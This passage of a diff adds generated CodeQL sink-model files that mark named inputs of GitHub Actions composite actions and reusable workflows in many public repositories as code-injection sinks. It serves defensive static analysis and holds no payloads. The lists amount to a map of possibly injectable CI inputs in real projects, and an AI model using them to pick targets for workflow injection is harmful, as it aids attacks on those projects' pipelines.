@@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.bucket", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.key-secret", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.key-id", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.endpoint", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.asset-path", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/actions/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml new file mode 100644 index 000000000000..8b529012be2b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.package_name", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.npm_tag", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.prev_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.new_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.pre_id", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/actions/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml new file mode 100644 index 000000000000..defeb5f7974f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "input.path", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "input.npm-tag", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "input.release-id", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/actions/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml new file mode 100644 index 000000000000..7eba6fb3b004 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/actions/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml new file mode 100644 index 000000000000..fc8085843ddc --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.project-id", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.relay-endpoint", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.gm-dapp-host", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.gm-dapp-project-secret", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.gm-dapp-project-id", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.explorer-endpoint", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.notify-endpoint", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/actions/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml new file mode 100644 index 000000000000..2d831ccbcedf --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"] + - ["wazuh/wazuh", "*", "input.doxygen_config", "code-injection", "generated"] + - ["wazuh/wazuh", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/actions/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml new file mode 100644 index 000000000000..b8892f32d7fe --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"] + - ["web-infra-dev/rspack", "*", "input.profile", "code-injection", "generated"] + - ["web-infra-dev/rspack", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/actions/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml new file mode 100644 index 000000000000..3809c827dda9 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/actions/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml new file mode 100644 index 000000000000..88f4246b1623 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/actions/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml new file mode 100644 index 000000000000..35d394a116fc --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"] + - ["xrplf/rippled", "*", "input.cmake-target", "code-injection", "generated"] + - ["xrplf/rippled", "*", "input.cmake-args", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/actions/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml new file mode 100644 index 000000000000..234ed7fef076 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"] + - ["zcash/zcash", "*", "input.remove-first-if-exists", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/actions/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml new file mode 100644 index 000000000000..e9ad23c8331e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/actions/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml new file mode 100644 index 000000000000..49ac7d2bf717 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"] + - ["zeroc-ice/ice", "*", "input.make_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml new file mode 100644 index 000000000000..99041db6e26d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml new file mode 100644 index 000000000000..dd132b20a05b --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_name", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/bump-version.yaml", "*", "input.message", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/build.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml new file mode 100644 index 000000000000..e87804d0cf85 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.head-pr-branch", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.reference-files", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.target-folder", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/codeql-analysis.yml", "*", "input.build-command", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/check-dist.yml", "*", "input.dist-path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml new file mode 100644 index 000000000000..0927d449d371 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"] + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.file-dir", "code-injection", "generated"] + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.build-args", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml new file mode 100644 index 000000000000..a98bbaed725a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] + - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml new file mode 100644 index 000000000000..0beb8e432fe6 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] + - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml new file mode 100644 index 000000000000..0d0f030c6233 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml new file mode 100644 index 000000000000..3574c02b4ed0 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml new file mode 100644 index 000000000000..1ce82c53df5e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml new file mode 100644 index 000000000000..f2eec6681d3e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml new file mode 100644 index 000000000000..a4a008154f56 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.jdk", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.sql_compatibility", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.override_config_path", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.testing_groups", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.use_indexer", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.runtime_jdk", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "input.it", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "input.script", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "input.build_jdk", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml new file mode 100644 index 000000000000..d85bd42f7a43 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.environment", "code-injection", "generated"] + - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml new file mode 100644 index 000000000000..391b22d88672 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] + - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml new file mode 100644 index 000000000000..962623cd9133 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml new file mode 100644 index 000000000000..99ce22f3f64f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.quay_image_name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml new file mode 100644 index 000000000000..e52acbad13ce --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.quay_image_name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml new file mode 100644 index 000000000000..989f9aae9376 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml new file mode 100644 index 000000000000..e34a4b3910b2 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml new file mode 100644 index 000000000000..9a1991ddc814 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.parameters-file", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.workspace_name", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.resource_group", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.dockerfile-location", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.environment_file", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.workspace_name", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.resource_group", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml new file mode 100644 index 000000000000..0316d82a5e3a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.track", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml new file mode 100644 index 000000000000..16d8ba2b9267 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.track", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml new file mode 100644 index 000000000000..1a59c9bf160b --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] + - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.environment", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml new file mode 100644 index 000000000000..fb13f2451d9d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml new file mode 100644 index 000000000000..ac92d435f745 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml new file mode 100644 index 000000000000..278801efa2d7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.IMAGE_NAME", "code-injection", "generated"] + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml new file mode 100644 index 000000000000..f426656c0769 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml new file mode 100644 index 000000000000..17d1c687f62c --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml 
@@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.last_commit", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.binary_name_stem", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "input.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_vscode_ext.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.config_file", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.wasi_sdk_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.wamr_app_framework_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "input.runner", 